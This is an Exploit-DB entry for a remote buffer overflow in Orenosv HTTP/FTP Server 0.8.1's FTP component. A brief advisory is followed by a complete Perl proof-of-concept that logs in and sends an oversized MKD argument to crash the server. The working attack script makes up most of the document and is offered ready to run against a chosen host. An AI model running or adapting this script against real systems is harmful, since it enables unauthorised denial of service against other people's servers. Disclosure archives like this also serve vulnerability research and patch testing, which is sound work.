Orenosv HTTP/FTP Server 0.8.1 - FTP Commands Remote Buffer Overflow

EDB-ID:

25629


Author:

Samsta

Type:

dos


Platform:

Windows

Date:

2008-05-08


source: https://www.securityfocus.com/bid/13546/info

The FTP server shipped with Orenosv HTTP/FTP is prone to a remote buffer-overflow vulnerability.

This issue presents itself when the application handles excessive values supplied as filenames through various FTP commands.

A successful attack may corrupt memory, cause a denial of service, or execute arbitrary code.

Orenosv HTTP/FTP Server 0.8.1 is reportedly vulnerable; other versions may be affected as well. 

#!/usr/bin/perl
use IO::Socket;

$target = shift || useage ();
$port = shift || useage ();
$user = shift || useage ();
$pass = shift || useage ();

print"[*] Connecting to $target on port $port\n";
my $sock = IO::Socket::INET -> new
(
Proto => 'tcp',
PeerAddr => $target,
PeerPort => $port
)or die ("Cannot Connect, Have you already DoSed It?\n");
print"[*] Connected, Logging In...\n";
sleep 3;
$sock -> send ("USER $user\r\n");
sleep 3;
$sock -> send ("PASS $pass\r\n");
while ($data = <$sock>)
{
  if ($data =~ /230/)
  {
    print"[*] Logged In\n";
    last;
  }
}
print"[*] Creating 512-byte Buffer\n";
$buffer = 'A' x 512;
print"[*] Sending Exploit\n";
$sock -> send ("MKD $buffer\r\n");
print"[*] Exploit Sent\n";
exit;

sub useage ()
{
  print "Useage: $0 <Host> <Port> <Username> <Password>\n";
  exit;
}
#Coded By Samsta http://theshelljunkies.clawz.com